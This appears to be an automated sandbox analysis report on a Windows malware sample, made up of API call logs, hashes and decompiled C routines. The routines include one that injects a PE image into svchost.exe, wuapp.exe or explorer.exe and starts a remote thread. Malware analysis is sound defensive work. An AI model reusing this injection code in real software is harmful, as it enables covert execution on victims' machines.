• VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004,00005A4D,74B05B60,?,?,035D563B,?,00000000,00000000,00000000), ref: 035D5A79
• ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000040,00000000,?,?,035D563B,?,00000000,00000000,00000000), ref: 035D5A8C
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,035D563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 035D5A9E
• VirtualFree.KERNEL32(00000000,00000000,00008000,035D49E6,?,?,035D563B,?,00000000,00000000,00000000), ref: 035D5ACB
• VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004,?,?,035D563B,?,00000000,00000000,00000000), ref: 035D5AD8
• ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000018,00000000,?,?,035D563B,?,00000000,00000000,00000000), ref: 035D5AF2
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,035D563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 035D5B10
• VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,035D563B,?,00000000,00000000,00000000), ref: 035D5B1F
• ReadProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,035D563B,?,00000000,00000000,00000000), ref: 035D5B35
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,035D563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 035D5B47
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,035D563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 035D5B6A
Memory Dump Source
• Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
Yara matches
Similarity
• API ID: Virtual$Free$AllocMemoryProcessRead
• String ID:
• API String ID: 1260273505-0
• Opcode ID: a016455ba07ac6334c8be2811735e6e13c72dfed8973b85bc0674ee8ba0e75c3
• Instruction ID: 58d8427f4b6afa5686a1fcf27c6f835dfa1942e989c9bc17b2b4d67f1afb5e4d
• Opcode Fuzzy Hash: a016455ba07ac6334c8be2811735e6e13c72dfed8973b85bc0674ee8ba0e75c3
• Instruction Fuzzy Hash: 40318F71241314BBEB319E99EC41F9A7BA8FB05B15F100455FB04AB1D0D7B1A8159BA4
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 22%
			E035D7FA0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				/* Decompiled routine (cleaned up): resolves a shell folder path.
				   _a4 = caller's output buffer, _a8 = pointer to a KNOWNFOLDERID,
				   _a12 = CSIDL value used by the legacy fallback. Returns 1 on success, 0 on failure. */
				char _v8;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t22;

				_t22 = LoadLibraryA("Shell32.dll");
				if(_t22 == 0) {
					L8:
					return 0;
				} else {
					/* Preferred API (Vista and later), resolved dynamically by name. */
					_t11 = GetProcAddress(_t22, "SHGetKnownFolderPath");
					if(_t11 == 0) {
						/* Fallback for older systems: SHGetFolderPathW with a CSIDL. */
						_t12 = GetProcAddress(_t22, "SHGetFolderPathW");
						if(_t12 == 0) {
							goto L7;
						} else {
							/* SHGetFolderPathW(hwndOwner=0, nFolder=_a12, hToken=0, dwFlags=0, pszPath=_a4) */
							if( ( *_t12)(0, _a12, 0, 0, _a4) == 0) {   /* S_OK */
								goto L4;
							} else {
								goto L7;
							}
						}
					} else {
						_v8 = 0;
						/* SHGetKnownFolderPath(rfid=_a8, dwFlags=0, hToken=0, ppszPath=&_v8) */
						if( ( *_t11)(_a8, 0, 0,  &_v8) != 0) {
							L7:
							FreeLibrary(_t22);
							goto L8;
						} else {
							E035D1A00(_a4, _v8);          /* copy the returned path into the caller's buffer */
							__imp__CoTaskMemFree(_v8);    /* release the string allocated by the shell */
							L4:
							FreeLibrary(_t22);
							return 1;
						}
					}
				}
			}

                                                                                                                                          0x035d7fd1
                                                                                                                                          0x035d7fd3
                                                                                                                                          0x035d7fd5
                                                                                                                                          0x035d7fdc
                                                                                                                                          0x035d8028
                                                                                                                                          0x035d8029
                                                                                                                                          0x00000000
                                                                                                                                          0x035d7fde
                                                                                                                                          0x035d7fe4
                                                                                                                                          0x035d7fef
                                                                                                                                          0x035d7ff5
                                                                                                                                          0x035d7ff6
                                                                                                                                          0x035d8005
                                                                                                                                          0x035d8005
                                                                                                                                          0x035d7fdc
                                                                                                                                          0x035d7fc4

                                                                                                                                          APIs
                                                                                                                                          • LoadLibraryA.KERNEL32(Shell32.dll,00000000,?,?,035D461E,C:\ProgramData\LKBNMTFJgl,035DAAE0,00000023), ref: 035D7FAA
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath,?,?,035D461E,C:\ProgramData\LKBNMTFJgl,035DAAE0,00000023), ref: 035D7FBC
                                                                                                                                          • CoTaskMemFree.OLE32(00000000,035DAAE0), ref: 035D7FEF
                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,035D461E,C:\ProgramData\LKBNMTFJgl,035DAAE0,00000023), ref: 035D7FF6
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW,?,?,035D461E,C:\ProgramData\LKBNMTFJgl,035DAAE0,00000023), ref: 035D800C
                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,035D461E,C:\ProgramData\LKBNMTFJgl,035DAAE0,00000023), ref: 035D8029
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FreeLibrary$AddressProc$LoadTask
                                                                                                                                          • String ID: SHGetFolderPathW$SHGetKnownFolderPath$Shell32.dll
                                                                                                                                          • API String ID: 2437428030-337183102
                                                                                                                                          • Opcode ID: ca8f13d752749f94cbfa4cbe569341493cd7737df3001ae34f293c24b57ff2c8
                                                                                                                                          • Instruction ID: a85dc8f52d66d370ac3dcaf6e2a614d9fb9c003202730d45bfb577c7b2aafe3d
                                                                                                                                          • Opcode Fuzzy Hash: ca8f13d752749f94cbfa4cbe569341493cd7737df3001ae34f293c24b57ff2c8
                                                                                                                                          • Instruction Fuzzy Hash: B2019671641715BBDB31AFA8FC0AF9E7B68FF08641F040050FD04E51A0EBB5D625A695
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 035D63BC
                                                                                                                                          • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 035D644C
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?), ref: 035D6472
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 035D64C0
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 035D64F5
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 035D6591
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 035D65BA
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Virtual$Free$File$AllocModuleNameSize
                                                                                                                                          • String ID: @
                                                                                                                                          • API String ID: 994213472-2766056989
                                                                                                                                          • Opcode ID: ebc3762970712cf648a0e81cec32078f9c2fb543017b0269cf0408946954ed35
                                                                                                                                          • Instruction ID: 9fecf11d075eef3a16a050159bd5e989eb531866ff3bda3d68b66740efd4444d
                                                                                                                                          • Opcode Fuzzy Hash: ebc3762970712cf648a0e81cec32078f9c2fb543017b0269cf0408946954ed35
                                                                                                                                          • Instruction Fuzzy Hash: B2716771A4021CABEB20DF94EC49FEEBBB8FF08704F504156F604FA190D7B566499B94
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                          			E035D82B0(intOrPtr _a4) {
                                                                                                                                          				void* _v8;
                                                                                                                                          				long _v12;
                                                                                                                                          				void* _t20;
                                                                                                                                          				void* _t27;
                                                                                                                                          				void* _t34;
                                                                                                                                          				void* _t37;
                                                                                                                                          				void* _t38;
                                                                                                                                          
                                                                                                                                          				_v8 = 0;
                                                                                                                                          				_v12 = 0;
                                                                                                                                          				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) == 0) {
                                                                                                                                          					L4:
                                                                                                                                          					return 0;
                                                                                                                                          				} else {
                                                                                                                                          					if(GetTokenInformation(_v8, 1, 0, 0,  &_v12) != 0 || GetLastError() == 0x7a) {
                                                                                                                                          						_t20 = E035D15E0(_v12);
                                                                                                                                          						_t38 = _t37 + 4;
                                                                                                                                          						_t34 = _t20;
                                                                                                                                          						if(GetTokenInformation(_v8, 1, _t34, _v12,  &_v12) == 0 || IsValidSid( *_t34) == 0) {
                                                                                                                                          							_push(_t34);
                                                                                                                                          							goto L8;
                                                                                                                                          						} else {
                                                                                                                                          							_t27 = E035D7AA0( *_t34, _a4);
                                                                                                                                          							_t38 = _t38 + 8;
                                                                                                                                          							_push(_t34);
                                                                                                                                          							if(_t27 == 0) {
                                                                                                                                          								L8:
                                                                                                                                          								E035D1510();
                                                                                                                                          								CloseHandle(_v8);
                                                                                                                                          								return 0;
                                                                                                                                          							} else {
                                                                                                                                          								E035D1510();
                                                                                                                                          								CloseHandle(_v8);
                                                                                                                                          								return 1;
                                                                                                                                          							}
                                                                                                                                          						}
                                                                                                                                          					} else {
                                                                                                                                          						CloseHandle(_v8);
                                                                                                                                          						goto L4;
                                                                                                                                          					}
                                                                                                                                          				}
                                                                                                                                          			}


                                                                                                                                          APIs
                                                                                                                                          • GetCurrentProcess.KERNEL32(00000008,00000400), ref: 035D82CA
                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 035D82D1
                                                                                                                                          • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 035D82E8
                                                                                                                                          • GetLastError.KERNEL32 ref: 035D82F2
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 035D8300
                                                                                                                                          • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000), ref: 035D8327
                                                                                                                                          • IsValidSid.ADVAPI32(00000000), ref: 035D8333
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 035D8349
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 035D8373
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseHandleToken$InformationProcess$CurrentErrorLastOpenValid
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2832165296-0
                                                                                                                                          • Opcode ID: 022becb54ebe20c880f4b77d9dff24af1e56764e4c3fe476e146b145228f9f1a
                                                                                                                                          • Instruction ID: e99c52da11592a562dbd68f8e323f12d436b632990c03e96ee8a218080a582dd
                                                                                                                                          • Opcode Fuzzy Hash: 022becb54ebe20c880f4b77d9dff24af1e56764e4c3fe476e146b145228f9f1a
                                                                                                                                          • Instruction Fuzzy Hash: 42212C75901108BBDF31AFA8FD09F9EBBB9FF04241F1401A0F909E5164E7329A65AA91
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E035D3150(intOrPtr _a4) {
                                                                                                                                          				short _v524;
                                                                                                                                          				int _t6;
                                                                                                                                          				void* _t16;
                                                                                                                                          				char* _t17;
                                                                                                                                          				char* _t18;
                                                                                                                                          
                                                                                                                                          				if( *0x37a1314 == 0) {
                                                                                                                                          					if( *0x37a1318 == 0) {
                                                                                                                                          						_t17 = L"\\System32\\wuapp.exe";
                                                                                                                                          						_t18 = L"\\System32\\svchost.exe";
                                                                                                                                          					} else {
                                                                                                                                          						goto L4;
                                                                                                                                          					}
                                                                                                                                          				} else {
                                                                                                                                          					if( *0x37a1318 != 0) {
                                                                                                                                          						L4:
                                                                                                                                          						_t17 = L"\\SysWOW64\\wuapp.exe";
                                                                                                                                          						_t18 = L"\\SysWOW64\\svchost.exe";
                                                                                                                                          					} else {
                                                                                                                                          						_t17 = L"\\notepad.exe";
                                                                                                                                          						_t18 = L"\\explorer.exe";
                                                                                                                                          					}
                                                                                                                                          				}
                                                                                                                                          				_t6 = GetWindowsDirectoryW( &_v524, 0x104);
                                                                                                                                          				if(_t6 == 0 || _t6 > 0x104) {
                                                                                                                                          					return 0;
                                                                                                                                          				} else {
                                                                                                                                          					_t20 = _a4;
                                                                                                                                          					E035D1A00(_a4,  &_v524);
                                                                                                                                          					E035D1970(_a4, _t17);
                                                                                                                                          					if(E035D7ED0(_t20) != 0) {
                                                                                                                                          						L11:
                                                                                                                                          						return 1;
                                                                                                                                          					} else {
                                                                                                                                          						E035D1A00(_t20,  &_v524);
                                                                                                                                          						E035D1970(_t20, _t18);
                                                                                                                                          						_t16 = E035D7ED0(_t20);
                                                                                                                                          						if(_t16 != 0) {
                                                                                                                                          							goto L11;
                                                                                                                                          						} else {
                                                                                                                                          							return _t16;
                                                                                                                                          						}
                                                                                                                                          					}
                                                                                                                                          				}
                                                                                                                                          			}


                                                                                                                                          APIs
                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104,74B04D40,00000000), ref: 035D31A4
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DirectoryWindows
                                                                                                                                          • String ID: \SysWOW64\svchost.exe$\SysWOW64\wuapp.exe$\System32\svchost.exe$\System32\wuapp.exe$\explorer.exe$\notepad.exe
                                                                                                                                          • API String ID: 3619848164-3654143111
                                                                                                                                          • Opcode ID: 30f9461a810382565b3ead26fb8e5aa231982782c85988e1163b53ee1fbced85
                                                                                                                                          • Instruction ID: 6f507e4086edf4cd3b184b49ecac4f4f75243e7c42e30bda9a4f702e23e2d568
                                                                                                                                          • Opcode Fuzzy Hash: 30f9461a810382565b3ead26fb8e5aa231982782c85988e1163b53ee1fbced85
                                                                                                                                          • Instruction Fuzzy Hash: AA115E79B0171962EB30E55CBC44BAAB36CFB45165F0C01A6DC09C5130D7358AC582E7
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 17%
                                                                                                                                          			E035D29E0(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12, char _a16, DWORD* _a20, intOrPtr _a24) {
                                                                                                                                          				CHAR* _v8;
                                                                                                                                          				CHAR* _v12;
                                                                                                                                          				void* _v16;
                                                                                                                                          				long _v20;
                                                                                                                                          				CHAR* _v24;
                                                                                                                                          				long _v28;
                                                                                                                                          				CHAR* _v32;
                                                                                                                                          				struct HINSTANCE__* _v36;
                                                                                                                                          				intOrPtr* _v40;
                                                                                                                                          				long _v44;
                                                                                                                                          				long _v48;
                                                                                                                                          				long _v52;
                                                                                                                                          				char _v56;
                                                                                                                                          				long _v60;
                                                                                                                                          				long _v64;
                                                                                                                                          				long _v68;
                                                                                                                                          				long _v72;
                                                                                                                                          				long _v76;
                                                                                                                                          				char _v80;
                                                                                                                                          				void* _t112;
                                                                                                                                          				void* _t115;
                                                                                                                                          				CHAR* _t118;
                                                                                                                                          				CHAR* _t119;
                                                                                                                                          				CHAR* _t129;
                                                                                                                                          				signed short _t132;
                                                                                                                                          				CHAR* _t134;
                                                                                                                                          				_Unknown_base(*)()* _t135;
                                                                                                                                          				intOrPtr _t136;
                                                                                                                                          				intOrPtr _t137;
                                                                                                                                          				CHAR* _t138;
                                                                                                                                          				CHAR* _t141;
                                                                                                                                          				CHAR* _t142;
                                                                                                                                          				CHAR* _t147;
                                                                                                                                          				void* _t149;
                                                                                                                                          				CHAR* _t150;
                                                                                                                                          				void* _t164;
                                                                                                                                          				CHAR** _t165;
                                                                                                                                          				void* _t168;
                                                                                                                                          				void* _t170;
                                                                                                                                          				struct HINSTANCE__* _t176;
                                                                                                                                          				CHAR* _t177;
                                                                                                                                          				signed int _t178;
                                                                                                                                          				CHAR* _t180;
                                                                                                                                          				signed int _t185;
                                                                                                                                          				CHAR* _t188;
                                                                                                                                          				_Unknown_base(*)()** _t190;
                                                                                                                                          				intOrPtr _t192;
                                                                                                                                          				CHAR* _t193;
                                                                                                                                          				CHAR* _t195;
                                                                                                                                          				intOrPtr* _t196;
                                                                                                                                          				void* _t198;
                                                                                                                                          				signed short* _t199;
                                                                                                                                          				CHAR** _t201;
                                                                                                                                          				char _t202;
                                                                                                                                          				void* _t204;
                                                                                                                                          				void* _t205;
                                                                                                                                          				void* _t208;
                                                                                                                                          
                                                                                                                                          				_t186 = _a4;
                                                                                                                                          				_v8 = 0;
                                                                                                                                          				_v16 = 0;
                                                                                                                                          				_v12 = 0;
                                                                                                                                          				_v24 = 0;
                                                                                                                                          				_v28 = 0;
                                                                                                                                          				_v20 = 0;
                                                                                                                                          				_v48 = 0;
                                                                                                                                          				_v44 = 0;
                                                                                                                                          				 *_a20 = 0;
                                                                                                                                          				_t196 =  *0x37a1094(_a4);
                                                                                                                                          				_v40 = _t196;
                                                                                                                                          				if( *_t196 != 0x4550) {
                                                                                                                                          					L5:
                                                                                                                                          					return 0;
                                                                                                                                          				} else {
                                                                                                                                          					_v28 =  *((intOrPtr*)(_t196 + 0x50));
                                                                                                                                          					_v56 = _a8;
                                                                                                                                          					_v80 = 0x18;
                                                                                                                                          					_v76 = 0;
                                                                                                                                          					_v68 = 0;
                                                                                                                                          					_v72 = 0;
                                                                                                                                          					_v64 = 0;
                                                                                                                                          					_v60 = 0;
                                                                                                                                          					_v52 = 0;
                                                                                                                                          					_t112 =  *0x37a1098( &_v8, 0x1fffff,  &_v80,  &_v56);
                                                                                                                                          					if(_t112 != 0) {
                                                                                                                                          						goto L5;
                                                                                                                                          					} else {
                                                                                                                                          						_t208 =  *0x37a1314 - _t112; // 0x1
                                                                                                                                          						if(_t208 == 0) {
                                                                                                                                          							L6:
                                                                                                                                          							_t115 =  *0x37a10a8(_v8,  &_v12, 0,  &_v28, 0x3000, 0x40);
                                                                                                                                          							__eflags = _t115;
                                                                                                                                          							if(_t115 != 0) {
                                                                                                                                          								goto L4;
                                                                                                                                          							} else {
                                                                                                                                          								_t170 = VirtualAlloc(_t115, _v28, 0x3000, 0x40);
                                                                                                                                          								__eflags = _t170;
                                                                                                                                          								if(_t170 == 0) {
                                                                                                                                          									L43:
                                                                                                                                          									__eflags = _v12;
                                                                                                                                          									if(_v12 != 0) {
                                                                                                                                          										 *0x37a10ac(_v8,  &_v12,  &_v20, 0x8000);
                                                                                                                                          									}
                                                                                                                                          									_t118 = _v8;
                                                                                                                                          									__eflags = _t118;
                                                                                                                                          									if(_t118 != 0) {
                                                                                                                                          										 *0x37a1088(_t118);
                                                                                                                                          										_t118 = _v8;
                                                                                                                                          									}
                                                                                                                                          									__eflags = _t170;
                                                                                                                                          									if(_t170 != 0) {
                                                                                                                                          										VirtualFree(_t170, 0, 0x8000);
                                                                                                                                          										_t118 = _v8;
                                                                                                                                          									}
                                                                                                                                          									__eflags = _v24;
                                                                                                                                          									_v20 = 0;
                                                                                                                                          									if(_v24 != 0) {
                                                                                                                                          										 *0x37a10ac(_t118,  &_v24,  &_v20, 0x8000);
                                                                                                                                          									}
                                                                                                                                          									_t119 = _v16;
                                                                                                                                          									__eflags = _t119;
                                                                                                                                          									if(_t119 != 0) {
                                                                                                                                          										 *0x37a1088(_t119);
                                                                                                                                          									}
                                                                                                                                          									__eflags = 0;
                                                                                                                                          									return 0;
                                                                                                                                          								} else {
                                                                                                                                          									E035D1640(_t170, _t186, _v28);
                                                                                                                                          									_t205 = _t204 + 0xc;
                                                                                                                                          									_t188 =  *((intOrPtr*)(_t196 + 0x80)) + _t170;
                                                                                                                                          									__eflags = _t188;
                                                                                                                                          									while(1) {
                                                                                                                                          										_t129 = _t188[0xc];
                                                                                                                                          										_v32 = _t188;
                                                                                                                                          										__eflags = _t129;
                                                                                                                                          										if(_t129 != 0) {
                                                                                                                                          											goto L11;
                                                                                                                                          										}
                                                                                                                                          										__eflags = _t188[4] - _t129;
                                                                                                                                          										if(_t188[4] == _t129) {
                                                                                                                                          											_t136 = _v40;
                                                                                                                                          											_t177 = _v12;
                                                                                                                                          											_t192 = _a4;
                                                                                                                                          											_t45 = _t136 + 0xa0; // 0x45dd842a
                                                                                                                                          											_t46 = _t136 + 0x34; // 0x0
                                                                                                                                          											_t137 =  *_t46;
                                                                                                                                          											_t201 =  *_t45 + _t170;
                                                                                                                                          											_v40 = _t177 - _t137;
                                                                                                                                          											__eflags =  *_t201;
                                                                                                                                          											_v36 = _t192 - _t137;
                                                                                                                                          											if( *_t201 != 0) {
                                                                                                                                          												do {
                                                                                                                                          													_t193 = _t201[1];
                                                                                                                                          													_t50 =  &(_t201[1]); // 0x45dd842e
                                                                                                                                          													_t165 = _t50;
                                                                                                                                          													_v32 = _t165;
                                                                                                                                          													__eflags = _t193 - 8;
                                                                                                                                          													if(_t193 >= 8) {
                                                                                                                                          														_t185 = 0;
                                                                                                                                          														_t195 =  &(_t193[0xfffffffffffffff8]) >> 1;
                                                                                                                                          														__eflags = _t195;
                                                                                                                                          														if(_t195 != 0) {
                                                                                                                                          															asm("o16 nop [eax+eax]");
                                                                                                                                          															do {
                                                                                                                                          																_t178 =  *(_t201 + 8 + _t185 * 2) & 0x0000ffff;
                                                                                                                                          																__eflags = _t178;
                                                                                                                                          																if(_t178 != 0) {
                                                                                                                                          																	_t180 =  &(( *_t201)[_t178 & 0x00000fff]);
                                                                                                                                          																	_t57 =  &(_t180[_t170]);
                                                                                                                                          																	 *_t57 = _t180[_t170] + _v40 - _v36;
                                                                                                                                          																	__eflags =  *_t57;
                                                                                                                                          																}
                                                                                                                                          																_t185 = _t185 + 1;
                                                                                                                                          																__eflags = _t185 - _t195;
                                                                                                                                          															} while (_t185 < _t195);
                                                                                                                                          															_t165 = _v32;
                                                                                                                                          														}
                                                                                                                                          													}
                                                                                                                                          													_t201 = _t201 +  *_t165;
                                                                                                                                          													__eflags =  *_t201;
                                                                                                                                          												} while ( *_t201 != 0);
                                                                                                                                          												_t177 = _v12;
                                                                                                                                          												_t192 = _a4;
                                                                                                                                          											}
                                                                                                                                          											_t138 =  *0x37a109c(_v8, _t177, _t170, _v28, 0);
                                                                                                                                          											__eflags = _t138;
                                                                                                                                          											if(_t138 < 0) {
                                                                                                                                          												goto L43;
                                                                                                                                          											} else {
                                                                                                                                          												_t202 = _a16;
                                                                                                                                          												_t141 =  *0x37a10a8(_v8,  &_v24, 0,  &_a16, 0x3000, 4);
                                                                                                                                          												__eflags = _t141;
                                                                                                                                          												if(_t141 != 0) {
                                                                                                                                          													goto L43;
                                                                                                                                          												} else {
                                                                                                                                          													_t142 =  *0x37a109c(_v8, _v24, _a12, _t202, _t141);
                                                                                                                                          													__eflags = _t142;
                                                                                                                                          													if(_t142 < 0) {
                                                                                                                                          														goto L43;
                                                                                                                                          													} else {
                                                                                                                                          														_t147 =  *0x37a10a0(_v8, 0, 0, 0, 0, 0, _v12 - _t192 + _a24, _v24,  &_v16, 0);
                                                                                                                                          														__eflags = _t147;
                                                                                                                                          														if(_t147 < 0) {
                                                                                                                                          															goto L43;
                                                                                                                                          														} else {
                                                                                                                                          															asm("xorps xmm0, xmm0");
                                                                                                                                          															asm("movlpd [ebp-0x2c], xmm0");
                                                                                                                                          															_t149 =  *0x37a10a4(_v16, 0,  &_v48);
                                                                                                                                          															__eflags = _t149 - 0x102;
                                                                                                                                          															if(_t149 == 0x102) {
                                                                                                                                          																while(1) {
                                                                                                                                          																	__eflags =  *0x37a2118;
                                                                                                                                          																	if( *0x37a2118 != 0) {
                                                                                                                                          																		break;
                                                                                                                                          																	}
                                                                                                                                          																	Sleep(0xbb8);
                                                                                                                                          																	_t164 =  *0x37a10a4(_v16, 0,  &_v48);
                                                                                                                                          																	__eflags = _t164 - 0x102;
                                                                                                                                          																	if(_t164 == 0x102) {
                                                                                                                                          																		continue;
                                                                                                                                          																	} else {
                                                                                                                                          																	}
                                                                                                                                          																	goto L41;
                                                                                                                                          																}
                                                                                                                                          																TerminateThread(_v16, 0);
                                                                                                                                          															}
                                                                                                                                          															L41:
                                                                                                                                          															_t150 = GetExitCodeThread(_v16, _a20);
                                                                                                                                          															__eflags = _t150;
                                                                                                                                          															if(_t150 == 0) {
                                                                                                                                          																goto L43;
                                                                                                                                          															} else {
                                                                                                                                          																 *0x37a1088(_v16);
                                                                                                                                          																 *0x37a10ac(_v8,  &_v12,  &_v20, 0x8000);
                                                                                                                                          																 *0x37a1088(_v8);
                                                                                                                                          																VirtualFree(_t170, 0, 0x8000);
                                                                                                                                          																_v20 = 0;
                                                                                                                                          																 *0x37a10ac(_v8,  &_v24,  &_v20, 0x8000);
                                                                                                                                          																return 1;
                                                                                                                                          															}
                                                                                                                                          														}
                                                                                                                                          													}
                                                                                                                                          												}
                                                                                                                                          											}
                                                                                                                                          										} else {
                                                                                                                                          											goto L11;
                                                                                                                                          										}
                                                                                                                                          										goto L54;
                                                                                                                                          										L11:
                                                                                                                                          										_t176 = E035D8B00( &(_t129[_t170]));
                                                                                                                                          										_t205 = _t205 + 4;
                                                                                                                                          										_v36 = _t176;
                                                                                                                                          										__eflags = _t176;
                                                                                                                                          										if(_t176 == 0) {
                                                                                                                                          											goto L43;
                                                                                                                                          										} else {
                                                                                                                                          											_t198 = _t170 +  *_t188;
                                                                                                                                          											_t190 = _t170 + _t188[0x10];
                                                                                                                                          											__eflags = _t198 - _t170;
                                                                                                                                          											_t199 =  ==  ? _t190 : _t198;
                                                                                                                                          											__eflags = _t199 - _t170;
                                                                                                                                          											if(_t199 == _t170) {
                                                                                                                                          												goto L43;
                                                                                                                                          											} else {
                                                                                                                                          												_t132 =  *_t199;
                                                                                                                                          												__eflags = _t132;
                                                                                                                                          												if(__eflags == 0) {
                                                                                                                                          													L19:
                                                                                                                                          													_t188 =  &(_v32[0x14]);
                                                                                                                                          													continue;
                                                                                                                                          												} else {
                                                                                                                                          													L14:
                                                                                                                                          													L14:
                                                                                                                                          													if(__eflags >= 0) {
                                                                                                                                          														_t134 = _t132 + 2 + _t170;
                                                                                                                                          														__eflags = _t134;
                                                                                                                                          													} else {
                                                                                                                                          														_t134 = _t132 & 0x0000ffff;
                                                                                                                                          													}
                                                                                                                                          													_t135 = GetProcAddress(_t176, _t134);
                                                                                                                                          													 *_t190 = _t135;
                                                                                                                                          													__eflags = _t135;
                                                                                                                                          													if(_t135 == 0) {
                                                                                                                                          														goto L43;
                                                                                                                                          													}
                                                                                                                                          													_t132 = _t199[2];
                                                                                                                                          													_t199 =  &(_t199[2]);
                                                                                                                                          													_t176 = _v36;
                                                                                                                                          													_t190 = _t190 + 4;
                                                                                                                                          													__eflags = _t132;
                                                                                                                                          													if(__eflags != 0) {
                                                                                                                                          														goto L14;
                                                                                                                                          													} else {
                                                                                                                                          														goto L19;
													}
												}
											}
										}
										goto L54;
									}
								}
							}
						} else {
							_t168 = E035D8270(__ecx, _v8);
							_t204 = _t204 + 4;
							if(_t168 != 0) {
								goto L6;
							} else {
								L4:
								 *0x37a1088(_v8);
								goto L5;
							}
						}
					}
				}
				L54:
			}

[Disassembly address column only; the instruction mnemonic/operand columns were not preserved in this extraction: 219 entries, addresses 0x035d29eb through 0x035d2dc2 in listing order, including several 0x00000000 entries.]
                                                                                                                                          0x035d2b54
                                                                                                                                          0x035d2b54
                                                                                                                                          0x035d2b60
                                                                                                                                          0x035d2b66
                                                                                                                                          0x035d2b68
                                                                                                                                          0x035d2b6a
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2b70
                                                                                                                                          0x035d2b73
                                                                                                                                          0x035d2b76
                                                                                                                                          0x035d2b79
                                                                                                                                          0x035d2b7c
                                                                                                                                          0x035d2b7e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2b7e
                                                                                                                                          0x035d2b50
                                                                                                                                          0x035d2b46
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2b30
                                                                                                                                          0x035d2b0f
                                                                                                                                          0x035d2af4
                                                                                                                                          0x035d2aa0
                                                                                                                                          0x035d2aa3
                                                                                                                                          0x035d2aa8
                                                                                                                                          0x035d2aad
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2aaf
                                                                                                                                          0x035d2aaf
                                                                                                                                          0x035d2ab2
                                                                                                                                          0x00000000
                                                                                                                                          0x035d2ab2
                                                                                                                                          0x035d2aad
                                                                                                                                          0x035d2a9e
                                                                                                                                          0x035d2a96
                                                                                                                                          0x00000000

                                                                                                                                          APIs
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,00000000), ref: 035D2AEA
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000002), ref: 035D2B60
                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 035D2CB5
                                                                                                                                          • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 035D2CE0
